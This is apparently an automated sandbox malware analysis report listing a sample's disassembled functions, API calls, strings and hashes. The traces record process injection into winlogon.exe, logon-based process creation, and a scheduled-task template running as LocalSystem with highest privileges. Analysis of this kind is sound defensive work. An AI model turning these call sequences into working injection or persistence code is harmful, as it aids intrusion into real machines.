                                                                                                                                                                                                              • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                              • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                              • API String ID: 1601901853-1561668989
                                                                                                                                                                                                              • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                              Function 004018E0 Relevance: 52.7, APIs: 29, Strings: 1, Instructions: 234memoryprocessCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,77305430,00000000,?), ref: 00401923
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              Function 00401670 Relevance: 40.5, APIs: 21, Strings: 2, Instructions: 215injectionlibrarymemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,774D0F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,75C8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,75C8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              Function 00401CF0 Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 90processthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,774D0F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                              Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Function 0043A650 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VUUU
                                                                                                                                                                                                              • API String ID: 0-2040033107
                                                                                                                                                                                                              • Opcode ID: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction ID: 83c8b6d4ae9392d60502dd360fb7ca1817b1c3f4776dddc770d92cd40da689bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f79c7f42cc70f7068980618b596982cd5e35ccfe9f944101c43b8ac65fe0c5e4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8FC1F571A4065647C728CF69C5902BAFBF1BF98310F08A12FD4D2D6B81E338E555CB55
                                                                                                                                                                                                              Function 00423970 Relevance: .8, Instructions: 833COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction ID: 49f4f21d9b48f79dac2c560b4f9f45e3af11d3fe5a8b8c575f21095663944224
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020a8c1551cdac237fbd27fc613c63b8374db010d48759c7608309d9e20808df
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 466217302083668FE711CF349998AAB7BE4EF9B342F448559E881C7372DB35C949C799
                                                                                                                                                                                                              Function 00447EDD Relevance: .8, Instructions: 789COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                              • Instruction ID: 819080bdcba4aba2f410b402834f39c633db381555cbfe7eca53d93c247e6cbf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8be546a5801d80e10960c8fac69fe55b4532605c50e249de703d82068b70ae38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6362AD70E00A269BDB0CCF55C8906EDB7B2FF84311F14826EC81667B84DB78A955DF94
                                                                                                                                                                                                              Function 004356D0 Relevance: .7, Instructions: 705COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction ID: c7ae1df08a76fa61e3c99c46e8343ff6a04015de72be0cc750c2f716a6a279e4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2ea4baa25f466abac0af4e06c27490f445ebf81a1911c24c4fc019493ca33d5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F442D171900A499FDB14DFA8C880AEFBBF5EF4C308F14555EE446A7341D738A946CBA8
                                                                                                                                                                                                              Function 004460F0 Relevance: .5, Instructions: 504COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction ID: 296f88951ecf7cea7bff09f9537e53bf2d2ecc764958e0785ba560d75f276c2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9024046f4ec778ac0f2bc939b39aa8ef5a284e4206ce7968b5d9ca164917f460
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6112E5306017849FEB25CF18C5906AEBBF1BF46310F16855AE8E54B792C338ED46CB56
                                                                                                                                                                                                              Function 00445A20 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction ID: 373094f0e44d4ed5b4a76297d3e75846c5555569b6fb32489a2bef93388bd825
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d68117118ec2e5c05b55bad5372fd5ac0e5d8e685fa30279994fb4ae286abc12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C812D230A00B859FEF21CF18C590AAEB7F1FF95310F14855AE8A64B792C338AD46CB55
                                                                                                                                                                                                              Function 004467C0 Relevance: .5, Instructions: 499COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction ID: cfa054cb93e044cdae65f2de48f0eb828664dc1768648188419bb013471483e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f4f35a6acd8340eba5d2f955567a6f50c4cb051c9736d012dfe4b0e1d8c61a05
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA12D530A057849FEB25CF18C490AAABBF1EF53314F15855EE8E54B391C338AD46CB66
                                                                                                                                                                                                              Function 00444790 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction ID: c484f8b887487c68eb1831faa77cd2835b2ef54b83a3a9b38c3ea20a6c7484b0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe7f905eb35857b92b021dee202d37908d4751a86c5a789a819d9c595c827d8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA12D430A017859FEB21CF18C58079ABBF1FF96310F19855AE8A59B381D338ED46CB65
                                                                                                                                                                                                              Function 00442340 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                              Function 00442FA0 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                              Function 00443C00 Relevance: .5, Instructions: 473COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                              Function 004416D0 Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                              Download Yara Rule
